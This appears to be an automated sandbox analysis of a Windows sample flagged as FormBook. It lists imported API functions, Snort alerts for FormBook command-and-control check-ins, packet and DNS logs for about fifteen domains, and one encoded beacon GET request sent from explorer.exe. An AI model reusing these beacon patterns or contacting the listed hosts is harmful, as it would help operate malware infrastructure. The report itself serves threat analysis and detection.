                                                                        USER32.dllScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                        GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                        SHELL32.dllSHGetMalloc, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                        ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                        COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                        ole32.dllOleInitialize, OleUninitialize, CoCreateInstance
                                                                        VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                        Possible Origin

                                                                        Language of compilation systemCountry where language is spokenMap
                                                                        EnglishUnited States

                                                                        Network Behavior

                                                                        Snort IDS Alerts

                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                        04/08/21-11:10:06.077676TCP1201ATTACK-RESPONSES 403 Forbidden804972723.227.38.74192.168.2.3
                                                                        04/08/21-11:11:04.291694TCP1201ATTACK-RESPONSES 403 Forbidden804974434.102.136.180192.168.2.3
                                                                        04/08/21-11:11:09.627646TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974580192.168.2.3192.185.48.194
                                                                        04/08/21-11:11:09.627646TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974580192.168.2.3192.185.48.194
                                                                        04/08/21-11:11:09.627646TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974580192.168.2.3192.185.48.194
                                                                        04/08/21-11:11:14.966415TCP1201ATTACK-RESPONSES 403 Forbidden804974634.102.136.180192.168.2.3
                                                                        04/08/21-11:11:20.052568TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974780192.168.2.352.58.78.16
                                                                        04/08/21-11:11:20.052568TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974780192.168.2.352.58.78.16
                                                                        04/08/21-11:11:20.052568TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974780192.168.2.352.58.78.16
                                                                        04/08/21-11:11:30.573548TCP1201ATTACK-RESPONSES 403 Forbidden804974923.227.38.74192.168.2.3

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Apr 8, 2021 11:10:00.217864037 CEST4972480192.168.2.3208.91.197.91
                                                                        Apr 8, 2021 11:10:00.365052938 CEST8049724208.91.197.91192.168.2.3
                                                                        Apr 8, 2021 11:10:00.365211964 CEST4972480192.168.2.3208.91.197.91
                                                                        Apr 8, 2021 11:10:00.365288973 CEST4972480192.168.2.3208.91.197.91
                                                                        Apr 8, 2021 11:10:00.554486990 CEST8049724208.91.197.91192.168.2.3
                                                                        Apr 8, 2021 11:10:00.582693100 CEST8049724208.91.197.91192.168.2.3
                                                                        Apr 8, 2021 11:10:00.582726002 CEST8049724208.91.197.91192.168.2.3
                                                                        Apr 8, 2021 11:10:00.582911015 CEST4972480192.168.2.3208.91.197.91
                                                                        Apr 8, 2021 11:10:00.582946062 CEST8049724208.91.197.91192.168.2.3
                                                                        Apr 8, 2021 11:10:00.583053112 CEST4972480192.168.2.3208.91.197.91
                                                                        Apr 8, 2021 11:10:00.583158970 CEST4972480192.168.2.3208.91.197.91
                                                                        Apr 8, 2021 11:10:00.650544882 CEST8049724208.91.197.91192.168.2.3
                                                                        Apr 8, 2021 11:10:00.650693893 CEST4972480192.168.2.3208.91.197.91
                                                                        Apr 8, 2021 11:10:00.730070114 CEST8049724208.91.197.91192.168.2.3
                                                                        Apr 8, 2021 11:10:05.925271034 CEST4972780192.168.2.323.227.38.74
                                                                        Apr 8, 2021 11:10:05.937638044 CEST804972723.227.38.74192.168.2.3
                                                                        Apr 8, 2021 11:10:05.937922001 CEST4972780192.168.2.323.227.38.74
                                                                        Apr 8, 2021 11:10:05.937941074 CEST4972780192.168.2.323.227.38.74
                                                                        Apr 8, 2021 11:10:05.952662945 CEST804972723.227.38.74192.168.2.3
                                                                        Apr 8, 2021 11:10:06.077676058 CEST804972723.227.38.74192.168.2.3
                                                                        Apr 8, 2021 11:10:06.077707052 CEST804972723.227.38.74192.168.2.3
                                                                        Apr 8, 2021 11:10:06.077727079 CEST804972723.227.38.74192.168.2.3
                                                                        Apr 8, 2021 11:10:06.077747107 CEST804972723.227.38.74192.168.2.3
                                                                        Apr 8, 2021 11:10:06.077764034 CEST804972723.227.38.74192.168.2.3
                                                                        Apr 8, 2021 11:10:06.077776909 CEST804972723.227.38.74192.168.2.3
                                                                        Apr 8, 2021 11:10:06.077792883 CEST804972723.227.38.74192.168.2.3
                                                                        Apr 8, 2021 11:10:06.077883959 CEST4972780192.168.2.323.227.38.74
                                                                        Apr 8, 2021 11:10:06.077912092 CEST4972780192.168.2.323.227.38.74
                                                                        Apr 8, 2021 11:10:06.077938080 CEST4972780192.168.2.323.227.38.74
                                                                        Apr 8, 2021 11:10:11.203042984 CEST4972880192.168.2.345.82.188.40
                                                                        Apr 8, 2021 11:10:11.230284929 CEST804972845.82.188.40192.168.2.3
                                                                        Apr 8, 2021 11:10:11.230503082 CEST4972880192.168.2.345.82.188.40
                                                                        Apr 8, 2021 11:10:11.923106909 CEST4972880192.168.2.345.82.188.40
                                                                        Apr 8, 2021 11:10:11.952112913 CEST804972845.82.188.40192.168.2.3
                                                                        Apr 8, 2021 11:10:11.952156067 CEST804972845.82.188.40192.168.2.3
                                                                        Apr 8, 2021 11:10:11.952167988 CEST804972845.82.188.40192.168.2.3
                                                                        Apr 8, 2021 11:10:11.952289104 CEST4972880192.168.2.345.82.188.40
                                                                        Apr 8, 2021 11:10:11.952354908 CEST4972880192.168.2.345.82.188.40
                                                                        Apr 8, 2021 11:10:11.980856895 CEST804972845.82.188.40192.168.2.3
                                                                        Apr 8, 2021 11:10:17.030925989 CEST4972980192.168.2.335.240.239.44
                                                                        Apr 8, 2021 11:10:17.300138950 CEST804972935.240.239.44192.168.2.3
                                                                        Apr 8, 2021 11:10:17.300318003 CEST4972980192.168.2.335.240.239.44
                                                                        Apr 8, 2021 11:10:17.300426006 CEST4972980192.168.2.335.240.239.44
                                                                        Apr 8, 2021 11:10:17.568850040 CEST804972935.240.239.44192.168.2.3
                                                                        Apr 8, 2021 11:10:17.568883896 CEST804972935.240.239.44192.168.2.3
                                                                        Apr 8, 2021 11:10:17.568898916 CEST804972935.240.239.44192.168.2.3
                                                                        Apr 8, 2021 11:10:17.569163084 CEST4972980192.168.2.335.240.239.44
                                                                        Apr 8, 2021 11:10:17.570935011 CEST4972980192.168.2.335.240.239.44
                                                                        Apr 8, 2021 11:10:17.839649916 CEST804972935.240.239.44192.168.2.3
                                                                        Apr 8, 2021 11:10:22.709868908 CEST4973180192.168.2.352.15.160.167
                                                                        Apr 8, 2021 11:10:22.820398092 CEST804973152.15.160.167192.168.2.3
                                                                        Apr 8, 2021 11:10:22.820521116 CEST4973180192.168.2.352.15.160.167
                                                                        Apr 8, 2021 11:10:22.820638895 CEST4973180192.168.2.352.15.160.167
                                                                        Apr 8, 2021 11:10:22.931169987 CEST804973152.15.160.167192.168.2.3
                                                                        Apr 8, 2021 11:10:22.931658030 CEST804973152.15.160.167192.168.2.3
                                                                        Apr 8, 2021 11:10:22.931688070 CEST804973152.15.160.167192.168.2.3
                                                                        Apr 8, 2021 11:10:22.931835890 CEST4973180192.168.2.352.15.160.167
                                                                        Apr 8, 2021 11:10:22.931879997 CEST4973180192.168.2.352.15.160.167
                                                                        Apr 8, 2021 11:10:23.042037010 CEST804973152.15.160.167192.168.2.3
                                                                        Apr 8, 2021 11:10:28.053559065 CEST4973780192.168.2.352.216.152.43
                                                                        Apr 8, 2021 11:10:28.154652119 CEST804973752.216.152.43192.168.2.3
                                                                        Apr 8, 2021 11:10:28.155349970 CEST4973780192.168.2.352.216.152.43
                                                                        Apr 8, 2021 11:10:28.155589104 CEST4973780192.168.2.352.216.152.43
                                                                        Apr 8, 2021 11:10:28.256407022 CEST804973752.216.152.43192.168.2.3
                                                                        Apr 8, 2021 11:10:28.264857054 CEST804973752.216.152.43192.168.2.3
                                                                        Apr 8, 2021 11:10:28.264894009 CEST804973752.216.152.43192.168.2.3
                                                                        Apr 8, 2021 11:10:28.265091896 CEST4973780192.168.2.352.216.152.43
                                                                        Apr 8, 2021 11:10:28.265119076 CEST4973780192.168.2.352.216.152.43
                                                                        Apr 8, 2021 11:10:28.294995070 CEST804973752.216.152.43192.168.2.3
                                                                        Apr 8, 2021 11:10:28.295182943 CEST4973780192.168.2.352.216.152.43
                                                                        Apr 8, 2021 11:10:28.365971088 CEST804973752.216.152.43192.168.2.3
                                                                        Apr 8, 2021 11:10:38.378814936 CEST4973880192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 11:10:38.489213943 CEST8049738198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 11:10:38.489316940 CEST4973880192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 11:10:38.489486933 CEST4973880192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 11:10:38.598885059 CEST8049738198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 11:10:38.605370045 CEST8049738198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 11:10:38.605474949 CEST8049738198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 11:10:38.605514050 CEST8049738198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 11:10:38.605544090 CEST8049738198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 11:10:38.605580091 CEST8049738198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 11:10:38.605597019 CEST4973880192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 11:10:38.605628014 CEST8049738198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 11:10:38.605669975 CEST8049738198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 11:10:38.605706930 CEST8049738198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 11:10:38.605743885 CEST8049738198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 11:10:38.605781078 CEST8049738198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 11:10:38.605846882 CEST4973880192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 11:10:38.605946064 CEST4973880192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 11:10:38.605999947 CEST4973880192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 11:10:38.715487957 CEST8049738198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 11:10:38.715523005 CEST8049738198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 11:10:38.715549946 CEST8049738198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 11:10:38.715572119 CEST8049738198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 11:10:38.715594053 CEST8049738198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 11:10:38.715615034 CEST8049738198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 11:10:38.715636969 CEST8049738198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 11:10:38.715656996 CEST8049738198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 11:10:38.715679884 CEST8049738198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 11:10:38.715704918 CEST8049738198.185.159.144192.168.2.3

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Apr 8, 2021 11:09:08.994635105 CEST5062053192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:09:09.007450104 CEST53506208.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:09:09.030910015 CEST6493853192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:09:09.049840927 CEST53649388.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:09:09.779433966 CEST6015253192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:09:09.792165995 CEST53601528.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:09:10.722485065 CEST5754453192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:09:10.735063076 CEST53575448.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:09:11.652503014 CEST5598453192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:09:11.664969921 CEST53559848.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:09:13.127620935 CEST6418553192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:09:13.140589952 CEST53641858.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:09:14.791832924 CEST6511053192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:09:14.806005001 CEST53651108.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:09:16.096054077 CEST5836153192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:09:16.108714104 CEST53583618.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:09:17.170089960 CEST6349253192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:09:17.182909966 CEST53634928.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:09:17.993604898 CEST6083153192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:09:18.006170988 CEST53608318.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:09:19.216720104 CEST6010053192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:09:19.229356050 CEST53601008.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:09:20.335616112 CEST5319553192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:09:20.348098040 CEST53531958.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:09:24.950217009 CEST5014153192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:09:24.963923931 CEST53501418.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:09:26.805066109 CEST5302353192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:09:26.817224026 CEST53530238.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:09:27.839957952 CEST4956353192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:09:27.852511883 CEST53495638.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:09:40.022869110 CEST5135253192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:09:40.035638094 CEST53513528.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:09:41.138885021 CEST5934953192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:09:41.150847912 CEST53593498.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:09:43.656533957 CEST5708453192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:09:43.694569111 CEST53570848.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:09:46.410795927 CEST5882353192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:09:46.423384905 CEST53588238.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:09:47.295176029 CEST5756853192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:09:47.307598114 CEST53575688.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:10:00.055316925 CEST5054053192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:10:00.211360931 CEST53505408.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:10:01.802232981 CEST5436653192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:10:01.815247059 CEST53543668.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:10:04.306127071 CEST5303453192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:10:04.324557066 CEST53530348.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:10:05.594171047 CEST5776253192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:10:05.924069881 CEST53577628.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:10:11.107856989 CEST5543553192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:10:11.175832033 CEST53554358.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:10:16.987714052 CEST5071353192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:10:17.028974056 CEST53507138.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:10:21.233629942 CEST5613253192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:10:21.259367943 CEST53561328.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:10:22.579443932 CEST5898753192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:10:22.699301958 CEST53589878.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:10:23.580167055 CEST5657953192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:10:23.599790096 CEST53565798.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:10:27.944003105 CEST6063353192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:10:28.052412033 CEST53606338.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:10:38.329937935 CEST6129253192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:10:38.376888037 CEST53612928.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:10:43.618215084 CEST6361953192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:10:43.652030945 CEST53636198.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:10:48.718440056 CEST6493853192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:10:48.759172916 CEST53649388.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:10:53.839416027 CEST6194653192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:10:53.887645006 CEST53619468.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:10:56.644263983 CEST6491053192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:10:56.656802893 CEST53649108.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:10:58.730592966 CEST5212353192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:10:58.763911963 CEST53521238.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:10:58.942035913 CEST5613053192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:10:59.049151897 CEST53561308.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:11:04.120409966 CEST5633853192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:11:04.159924030 CEST53563388.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:11:09.325669050 CEST5942053192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:11:09.481863976 CEST53594208.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:11:14.792407036 CEST5878453192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:11:14.825829983 CEST53587848.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:11:19.976470947 CEST6397853192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:11:20.030536890 CEST53639788.8.8.8192.168.2.3

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                        Apr 8, 2021 11:10:00.055316925 CEST192.168.2.38.8.8.80x82cStandard query (0)www.jamessicilia.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:05.594171047 CEST192.168.2.38.8.8.80xcf2cStandard query (0)www.kinfet.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:11.107856989 CEST192.168.2.38.8.8.80x693aStandard query (0)www.productsoffholland.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:16.987714052 CEST192.168.2.38.8.8.80x70f8Standard query (0)www.markmalls.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:22.579443932 CEST192.168.2.38.8.8.80x4a6bStandard query (0)www.zhuledao.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:27.944003105 CEST192.168.2.38.8.8.80x2af8Standard query (0)www.jcernadas.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:38.329937935 CEST192.168.2.38.8.8.80xd7fcStandard query (0)www.theholisticbirthco.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:43.618215084 CEST192.168.2.38.8.8.80xf91fStandard query (0)www.glgshopbd.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:48.718440056 CEST192.168.2.38.8.8.80x437aStandard query (0)www.tor-one.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:53.839416027 CEST192.168.2.38.8.8.80xa308Standard query (0)www.de-knutselkeet.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:58.942035913 CEST192.168.2.38.8.8.80xb165Standard query (0)www.autotrafficbot.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:11:04.120409966 CEST192.168.2.38.8.8.80xda3dStandard query (0)www.curiosityisthecurebook.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:11:09.325669050 CEST192.168.2.38.8.8.80xb04Standard query (0)www.usinggroovefunnels.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:11:14.792407036 CEST192.168.2.38.8.8.80x8358Standard query (0)www.cgpizza.netA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:11:19.976470947 CEST192.168.2.38.8.8.80x3223Standard query (0)www.physicalrobot.comA (IP address)IN (0x0001)

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                        Apr 8, 2021 11:10:00.211360931 CEST8.8.8.8192.168.2.30x82cNo error (0)www.jamessicilia.com208.91.197.91A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:05.924069881 CEST8.8.8.8192.168.2.30xcf2cNo error (0)www.kinfet.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                        Apr 8, 2021 11:10:05.924069881 CEST8.8.8.8192.168.2.30xcf2cNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:11.175832033 CEST8.8.8.8192.168.2.30x693aNo error (0)www.productsoffholland.comproductsoffholland.comCNAME (Canonical name)IN (0x0001)
                                                                        Apr 8, 2021 11:10:11.175832033 CEST8.8.8.8192.168.2.30x693aNo error (0)productsoffholland.com45.82.188.40A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:17.028974056 CEST8.8.8.8192.168.2.30x70f8No error (0)www.markmalls.com35.240.239.44A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:22.699301958 CEST8.8.8.8192.168.2.30x4a6bNo error (0)www.zhuledao.comprod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                        Apr 8, 2021 11:10:22.699301958 CEST8.8.8.8192.168.2.30x4a6bNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com52.15.160.167A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:22.699301958 CEST8.8.8.8192.168.2.30x4a6bNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.13.255.157A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:22.699301958 CEST8.8.8.8192.168.2.30x4a6bNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.14.206.30A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:28.052412033 CEST8.8.8.8192.168.2.30x2af8No error (0)www.jcernadas.com52.216.152.43A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:38.376888037 CEST8.8.8.8192.168.2.30xd7fcNo error (0)www.theholisticbirthco.comext-sq.squarespace.comCNAME (Canonical name)IN (0x0001)
                                                                        Apr 8, 2021 11:10:38.376888037 CEST8.8.8.8192.168.2.30xd7fcNo error (0)ext-sq.squarespace.com198.185.159.144A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:38.376888037 CEST8.8.8.8192.168.2.30xd7fcNo error (0)ext-sq.squarespace.com198.49.23.145A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:38.376888037 CEST8.8.8.8192.168.2.30xd7fcNo error (0)ext-sq.squarespace.com198.49.23.144A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:38.376888037 CEST8.8.8.8192.168.2.30xd7fcNo error (0)ext-sq.squarespace.com198.185.159.145A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:43.652030945 CEST8.8.8.8192.168.2.30xf91fServer failure (2)www.glgshopbd.comnonenoneA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:48.759172916 CEST8.8.8.8192.168.2.30x437aNo error (0)www.tor-one.com80.67.16.8A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:53.887645006 CEST8.8.8.8192.168.2.30xa308No error (0)www.de-knutselkeet.com188.93.150.75A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:59.049151897 CEST8.8.8.8192.168.2.30xb165No error (0)www.autotrafficbot.com45.88.202.115A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:11:04.159924030 CEST8.8.8.8192.168.2.30xda3dNo error (0)www.curiosityisthecurebook.comcuriosityisthecurebook.comCNAME (Canonical name)IN (0x0001)
                                                                        Apr 8, 2021 11:11:04.159924030 CEST8.8.8.8192.168.2.30xda3dNo error (0)curiosityisthecurebook.com34.102.136.180A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:11:09.481863976 CEST8.8.8.8192.168.2.30xb04No error (0)www.usinggroovefunnels.comusinggroovefunnels.comCNAME (Canonical name)IN (0x0001)
                                                                        Apr 8, 2021 11:11:09.481863976 CEST8.8.8.8192.168.2.30xb04No error (0)usinggroovefunnels.com192.185.48.194A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:11:14.825829983 CEST8.8.8.8192.168.2.30x8358No error (0)www.cgpizza.netcgpizza.netCNAME (Canonical name)IN (0x0001)
                                                                        Apr 8, 2021 11:11:14.825829983 CEST8.8.8.8192.168.2.30x8358No error (0)cgpizza.net34.102.136.180A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:11:20.030536890 CEST8.8.8.8192.168.2.30x3223No error (0)www.physicalrobot.com52.58.78.16A (IP address)IN (0x0001)

                                                                        HTTP Request Dependency Graph

                                                                        • www.jamessicilia.com
                                                                        • www.kinfet.com
                                                                        • www.productsoffholland.com
                                                                        • www.markmalls.com
                                                                        • www.zhuledao.com
                                                                        • www.jcernadas.com
                                                                        • www.theholisticbirthco.com
                                                                        • www.tor-one.com
                                                                        • www.de-knutselkeet.com
                                                                        • www.autotrafficbot.com
                                                                        • www.curiosityisthecurebook.com
                                                                        • www.usinggroovefunnels.com
                                                                        • www.cgpizza.net
                                                                        • www.physicalrobot.com

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        0192.168.2.349724208.91.197.9180C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 11:10:00.365288973 CEST1369OUTGET /evpn/?JDK8ix=fhrZBjxaI0WDrOMMLB9i/eTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.jamessicilia.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:10:00.582693100 CEST1370INHTTP/1.1 200 OK
                                                                        Date: Thu, 08 Apr 2021 09:10:00 GMT
                                                                        Server: Apache
                                                                        Set-Cookie: vsid=926vr3654186005020546; expires=Tue, 07-Apr-2026 09:10:00 GMT; Max-Age=157680000; path=/; domain=www.jamessicilia.com; HttpOnly
                                                                        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_Ru1fD82/Yqs+3Zye7dtXUZ/oJiDw2u1OxPgHM8xCyLYyWaTMGCWQidzM+A86L7os7uHpkd6J4BLmsTmMgA8SfQ==
                                                                        Content-Length: 2559
                                                                        Keep-Alive: timeout=5, max=84
                                                                        Connection: Keep-Alive
                                                                        Content-Type: text/html; charset=UTF-8
